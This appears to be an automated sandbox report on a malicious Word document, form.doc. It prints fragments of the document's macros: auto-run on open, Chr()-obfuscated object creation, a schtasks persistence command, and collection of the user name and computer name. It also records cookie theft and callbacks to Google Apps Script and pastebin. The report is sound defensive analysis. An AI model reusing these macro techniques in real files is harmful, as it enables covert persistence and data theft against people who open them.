Analysis Report

Overview

General Information

Joe Sandbox Version:	17.0.0
Analysis ID:	213966
Start time:	13:20:54
Joe Sandbox Product:	Cloud
Start date:	03.02.2017
Overall analysis duration:	0h 3m 57s
Report type:	full
Sample file name:	form.doc
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled
Detection:	MAL
Classification:	mal100.evad.expl.winDOC@5/18@9/6
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .doc
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, OSPPSVC.EXE, WmiApSrv.exe, conhost.exe, dllhost.exe Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

Click to jump to signature section

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: docs.google.com

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49162 -> 216.58.206.14:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49162 -> 216.58.206.14:443

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\wscript.exe

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\ProgramData\TransbaseOdbcDriver\LanCradDriver.vbs

Networking:

Urls found in memory or binary data

Show sources

Source: WINWORD.EXE	String found in binary or memory: file:///
Source: WINWORD.EXE	String found in binary or memory: file:///c:
Source: WINWORD.EXE	String found in binary or memory: file:///c:pxuq
Source: WINWORD.EXE	String found in binary or memory: http://
Source: 8059E9A0D314877E40FE93D8CCFB3C69_4A5995ABF71FDF7B853EF246F7E4900C.3052.dr	String found in binary or memory: http://clients1.google.com/ocsp/mekwrzbfmemwqtajbgurdgmcgguabbty4gr5hyodjxcbsrkjeqm1gih%2bzaqust0gfh
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://clients1.google.com/ocsp0
Source: WINWORD.EXE	String found in binary or memory: http://clients1.google.com/ocsphttp://pki.google.com/giag2.crlcom/
Source: WINWORD.EXE	String found in binary or memory: http://crl
Source: WINWORD.EXE	String found in binary or memory: http://crl.comd
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: WINWORD.EXE, form.doc, sig1C0F.tmp.3052.dr	String found in binary or memory: http://crl.comodoca.com/comodorsacertificationauthority.crl0q
Source: WINWORD.EXE, form.doc, sig1C0F.tmp.3052.dr	String found in binary or memory: http://crl.comodoca.com/comodorsacodesigningca.crl0t
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: 23B523C9E7746F715D33C6527C18EB9D.3052.dr	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crl
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crl0n
Source: WINWORD.EXE	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crl~#
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: WINWORD.EXE	String found in binary or memory: http://crt.comodoca.c
Source: WINWORD.EXE	String found in binary or memory: http://crt.comodoca.com/co
Source: WINWORD.EXE, form.doc, sig1C0F.tmp.3052.dr	String found in binary or memory: http://crt.comodoca.com/comodorsaaddtrustca.crt0$
Source: WINWORD.EXE, form.doc, sig1C0F.tmp.3052.dr	String found in binary or memory: http://crt.comodoca.com/comodorsacodesigningca.crt0$
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://g.symcb.com/crls/gtglobal.crl0
Source: 828298824EA5549947C17DDABF6871F5_6B5C8B321CA02275A82E95FA81D6DE62.3052.dr	String found in binary or memory: http://g.symcd.com/meqwqjbamd4wpdajbgurdgmcgguabbsxtdkxkba3l3lqeffgudsipnvt7gquapkqw0grtsncud5v8scxe
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://g.symcd.com0
Source: WINWORD.EXE	String found in binary or memory: http://g.symcd.comhttp://g.symcb.com/crls/gtglobal.crlns
Source: sig1C0F.tmp.3052.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://ocsp.entrust.net0d
Source: WINWORD.EXE, wscript.exe, TransbaseOdbcDriver.js.3052.dr	String found in binary or memory: http://pastebin.com/raw/mfqv5e6r
Source: wscript.exe	String found in binary or memory: http://pastebin.com/raw/mfqv5e6ry
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://pki.google.com/giag2.crl0
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://pki.google.com/giag2.crt0
Source: WINWORD.EXE	String found in binary or memory: http://sc
Source: WINWORD.EXE	String found in binary or memory: http://schema.org/creativework/formobject
Source: WINWORD.EXE	String found in binary or memory: http://uri.etsi.org/01903#signedproperties
Source: WINWORD.EXE	String found in binary or memory: http://uri.etsi.org/01903#signedpropertiesh1
Source: WINWORD.EXE	String found in binary or memory: http://uri.etsi.org/01903/v1.2.2#proofo4$
Source: WINWORD.EXE	String found in binary or memory: http://uri.etsi.org/01903/v1.2.2#proofoforiginh1
Source: WINWORD.EXE	String found in binary or memory: http://uri.etsi.org/01903/v1.3.2#
Source: WINWORD.EXE	String found in binary or memory: http://uri.etsi.org/01903/v1.3.2#0
Source: WINWORD.EXE	String found in binary or memory: http://uri.etsi.org/01903/v1.3.2#c14n-20010315
Source: WINWORD.EXE	String found in binary or memory: http://uri.etsi.org/01903/v1.3.2#h1
Source: WINWORD.EXE	String found in binary or memory: http://uri.etsi.org/01903/v1.3.2#ll
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: http://www.usertrust.com1
Source: WINWORD.EXE	String found in binary or memory: https://apis.google.com
Source: WINWORD.EXE	String found in binary or memory: https://docs.google.com/
Source: WINWORD.EXE	String found in binary or memory: https://docs.google.com/383
Source: sig1C0F.tmp.3052.dr, TransbaseOdbcDriver.js.3052.dr	String found in binary or memory: https://docs.google.com/forms/d/
Source: WINWORD.EXE	String found in binary or memory: https://docs.google.com/forms/d/1f1zy2codjxkccorfv42kif4mxdsz__bpxourgrkctyo/closedform
Source: WINWORD.EXE	String found in binary or memory: https://docs.google.com/forms/d/1f1zy2codjxkccorfv42kif4mxdsz__bpxourgrkctyo/formresponse
Source: WINWORD.EXE	String found in binary or memory: https://docs.google.com/forms/d/1f1zy2codjxkccorfv42kif4mxdsz__bpxourgrkctyo/formresponsej
Source: WINWORD.EXE	String found in binary or memory: https://docs.google.com/forms/d/1f1zy2codjxkccorfv42kif4mxdsz__bpxourgrkctyo/formresponseq
Source: WINWORD.EXE	String found in binary or memory: https://docs.google.com/forms/d/e/1faipqlsfdjwm1-gnq3u9mvvkkpm-dhiz-fdsxebrmo4yu1rex-nawzg/viewform?
Source: wscript.exe, TransbaseOdbcDriver.js.3052.dr	String found in binary or memory: https://docs.google.com/spreadsheet/ccc?key=
Source: wscript.exe	String found in binary or memory: https://drive.google.com/start/apps
Source: wscript.exe	String found in binary or memory: https://google.com/
Source: wscript.exe, TransbaseOdbcDriver.js.3052.dr	String found in binary or memory: https://script.google.com/macros/s/akfycbzoidrstseb5ijmwsxgzbvocsw4da2fzw0_fqokragwzh7h2ae/exec
Source: wscript.exe	String found in binary or memory: https://script.google.com/macros/s/akfycbzoidrstseb5ijmwsxgzbvocsw4da2fzw0_fqokragwzh7h2ae/exec?bid=
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: https://secure.comodo.com/cps0
Source: WINWORD.EXE	String found in binary or memory: https://secure.comodo.ne
Source: WINWORD.EXE, form.doc, sig1C0F.tmp.3052.dr	String found in binary or memory: https://secure.comodo.net/cps0c
Source: WINWORD.EXE	String found in binary or memory: https://ssl.gstatic.com/docs/forms/social/social-forms-big-2.png
Source: WINWORD.EXE	String found in binary or memory: https://ssl.gstatic.com/docs/spreadsheets/forms/favicon_qp2.png
Source: wscript.exe	String found in binary or memory: https://support.google.com/accounts/answer/151657?hl=en
Source: WINWORD.EXE	String found in binary or memory: https://support.google.com/docs/answer/2375082?hl=en
Source: WINWORD.EXE	String found in binary or memory: https://www.geotrust.co
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: https://www.geotrust.com/resources/repository0
Source: WINWORD.EXE	String found in binary or memory: https://www.google.com/forms/about/?utm_source=product&utm_medium=forms_confirmation&utm_campaign=fo
Source: WINWORD.EXE	String found in binary or memory: https://www.gstatic.com/_/freebird/_/js/k=freebird.v.en.nl5oyghc6ss.o/m=viewer_base/rt=j/d=1/rs=amjv
Source: WINWORD.EXE	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /crls/secureca.crl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: crl.geotrust.com
Source: global traffic	HTTP traffic detected: GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: g.symcd.com
Source: global traffic	HTTP traffic detected: GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCAa1FcpWF3k%2B HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: clients1.google.com

Found strings which match to known social media urls

Show sources

Source: WINWORD.EXE, wscript.exe	String found in binary or memory: *.youtube.com equals www.youtube.com (Youtube)
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE, wscript.exe	String found in binary or memory: youtube.com equals www.youtube.com (Youtube)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: docs.google.com

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run TransbaseOdbcDriver
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run TransbaseOdbcDriver

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run TransbaseOdbcDriver

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\System32\schtasks.exe

Stealing of Sensitive Information:

Steals Internet Explorer cookies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\ML8FX5YH.txt

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: form.doc	Stream path 'Macros/VBA/NewMacros' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module NewMacros			Name: NewMacros

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Show sources

Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: wscript.pdb source: wscript.exe
Source:	Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Source:	Binary string: msado15.pdb source: WINWORD.EXE
Source:	Binary string: wscript.pdbN source: wscript.exe
Source:	Binary string: scrrun.pdb source: wscript.exe

Binary contains paths to development resources

Show sources

Source: WINWORD.EXE

Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K

Classification label

Show sources

Source: classification engine

Classification label: mal100.evad.expl.winDOC@5/18@9/6

Creates files inside the program directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\ProgramData\TransbaseOdbcDriver

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\luketaylor\AppData\Roaming\Microsoft\Office\Recent\form.LNK

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\LUKETA~1\AppData\Local\Temp\CVRE0AB.tmp

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: form.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Show sources

Source: form.doc

OLE document summary: title field not present or empty

Executes visual basic scripts

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /tn 'SysChecks' /tr ''C:\Windows\System32\WScript.exe' 'C:\ProgramData\TransbaseOdbcDriver\starter.vbs'' /sc minute /mo 30

Found command line output

Show sources

Source: C:\Windows\System32\schtasks.exe	Console Write: ........a..v..0.....E.R.R.O.R.:. ..............................v..&.........\...4... ...VT......G..vd...............0.).
Source: C:\Windows\System32\schtasks.exe	Console Write: ........a..v..0.............x...j~................................-.................?.)......G'.$.......z...j..v...z....
Source: C:\Windows\System32\schtasks.exe	Console Write: ........a..v..0.....(.4.4.,.4.).:.L.o.g.o.n.T.y.p.e.:.........>w........d.Bw !Cw...v........,..........."... .....5u...v

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - SELECT Name, CommandLine, ProcessID FROM Win32_Process WHERE Name LIKE '%[cw]script.exe' AND CommandLine LIKE '%[cw]script%TransbaseOdbcDriver.js%'

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: unknown	Process created: C:\Windows\System32\wscript.exe
Source: unknown	Process created: C:\Windows\System32\schtasks.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\wscript.exe wscript C:\ProgramData\TransbaseOdbcDriver\TransbaseOdbcDriver.js
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /tn 'SysChecks' /tr ''C:\Windows\System32\WScript.exe' 'C:\ProgramData\TransbaseOdbcDriver\starter.vbs'' /sc minute /mo 30

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Document contains embedded VBA macros

Show sources

Source: form.doc

OLE indicator, VBA macros: true

Reads the hosts file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: form.doc	OLE, VBA macro line: Sub AutoOpen()
Source: form.doc	OLE, VBA macro line: Sub Workbook_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AutoOpen	Name: AutoOpen
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function Workbook_Open	Name: Workbook_Open

Document contains an embedded VBA macro which may execute processes

Show sources

Source: form.doc	OLE, VBA macro line: Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: procID = Shell("wscript " & figName, vbHide)
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: sh.Run "schtasks /create /tn ""SysChecks"" /tr """ & run_pth & """ /sc minute /mo 30", 0, False
Source: form.doc	OLE, VBA macro line: Application.Run ("ggl_hex")
Source: form.doc	OLE, VBA macro line: Application.Run ("BH5qxufh3" + (AP6fuezipn4("MzNXOTlmZw==") & "hjplkWrtqzzY"))
Source: form.doc	OLE, VBA macro line: Application.Run ("BH5qxufh3" + (AP6fuezipn4("MzNXOTlm") & "ghj" & Chr(-89 + 201) & Chr(-66 + 174) & Chr(12 + 95) & "WrtqzzY"))
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_hex, API Shell("wscript C:\ProgramData\TransbaseOdbcDriver\TransbaseOdbcDriver.js",0:Long)	Name: ggl_hex
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, API IWshShell3.Run("schtasks /create /tn "SysChecks" /tr ""C:\Windows\System32\WScript.exe" "C:\ProgramData\TransbaseOdbcDriver\starter.vbs"" /sc minute /mo 30",0:Integer,False)	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function BH5qxufh333W99fghjplkWrtqzzY, API Microsoft Word:Application.Run("ggl_hex")	Name: BH5qxufh333W99fghjplkWrtqzzY
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AutoOpen, API Microsoft Word:Application.Run("BH5qxufh333W99fghjplkWrtqzzY")	Name: AutoOpen

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: form.doc	OLE, VBA macro line: Set AM1wg7xyr = CreateObject((Chr(-57 + 134) & Chr(-21 + 136) & Chr(-26 + 146) & Chr(83 + 26) & Chr(-76 + 184) & Chr(91 + -41) & Chr(32 + 14) & Chr(15 + 53) & Chr(-16 + 95) & Chr(-69 + 146) & Chr(20 + 48) & Chr(-81 + 192) & Chr(97 + 2) & Chr(29 + 88) & Chr(23 + 86) & Chr(26 + 75) & Chr(-28 + 138) & Chr(-5 + 121) & Chr(54 + -8) & Chr(10 + 41) & Chr(74 + -28) & Chr(45 + 3)))
Source: form.doc	OLE, VBA macro line: Set AM1wg7xyr = CreateObject((Chr(10 + 67) & Chr(85 + 30) & Chr(85 + 35) & Chr(-97 + 206) & Chr(-64 + 172) & Chr(61 + -11) & Chr(-42 + 88) & Chr(-77 + 145) & Chr(-93 + 172) & Chr(-52 + 129) & Chr(39 + 29) & Chr(87 + 24) & Chr(-70 + 169) & Chr(-33 + 150) & Chr(12 + 97) & Chr(-13 + 114) & Chr(33 + 77) & Chr(-22 + 138) & Chr(-65 + 111) & Chr(27 + 24) & Chr(68 + -22) & Chr(71 + -23)))
Source: form.doc	OLE, VBA macro line: Set AU3sjrvsqt3j = CreateObject((Chr(-94 + 159) & Chr(3 + 65) & Chr(-12 + 91) & Chr(60 + 8) & Chr(-85 + 151) & Chr(38 + 8) & Chr(-2 + 85) & Chr(20 + 96) & Chr(68 + 46) & Chr(83 + 18) & Chr(-71 + 168) & Chr(62 + 47)))
Source: form.doc	OLE, VBA macro line: Set AU3sjrvsqt3j = CreateObject((Chr(-6 + 71) & Chr(89 + -21) & Chr(52 + 27) & Chr(61 + 7) & Chr(39 + 27) & Chr(-9 + 55) & Chr(56 + 27) & Chr(-52 + 168) & Chr(39 + 75) & Chr(5 + 96) & Chr(57 + 40) & Chr(22 + 87)))
Source: form.doc	OLE, VBA macro line: Set RE = CreateObject("VBScript.RegExp")
Source: form.doc	OLE, VBA macro line: Set FSO = CreateObject("Scripting.FileSystemObject")
Source: form.doc	OLE, VBA macro line: GetUserData = "UserName: " & Environ$("USERNAME") & " \| ComputerName: " & Environ$("COMPUTERNAME") & " \| UserDomain: " & Environ$("USERDOMAIN")
Source: form.doc	OLE, VBA macro line: Set HttpRequest = CreateObject("MSXML2.XMLHTTP")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")
Source: form.doc	OLE, VBA macro line: procID = Shell("wscript " & figName, vbHide)
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: Set sh = CreateObject("WScript.Shell")
Source: form.doc	OLE, VBA macro line: Dim wscript_pthpath: wscript_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\System32\WScript.exe"
Source: form.doc	OLE, VBA macro line: Dim wscript_pthpath: wscript_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\System32\WScript.exe"
Source: form.doc	OLE, VBA macro line: Dim run_pth_scr: run_pth_scr = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") + "\TransbaseOdbcDriver\starter.vbs"
Source: form.doc	OLE, VBA macro line: Dim run_pth: run_pth = """" & wscript_pthpath & """ """ & run_pth_scr & """"
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AL8vhpb5hk3w, String createobject: Set AM1wg7xyr = CreateObject((Chr(- 57 + 134) & Chr(- 21 + 136) & Chr(- 26 + 146) & Chr(83 + 26) & Chr(- 76 + 184) & Chr(91 + - 41) & Chr(32 + 14) & Chr(15 + 53) & Chr(- 16 + 95) & Chr(- 69 + 146) & Chr(20 + 48) & Chr(- 81 + 192) & Chr(97 + 2) & Chr(29 + 88) & Chr(23 + 86) & Chr(26 + 75) & Chr(- 28 + 138) & Chr(- 5 + 121) & Chr(54 + - 8) & Chr(10 + 41) & Chr(74 + - 28) & Chr(45 + 3)))	Name: AL8vhpb5hk3w
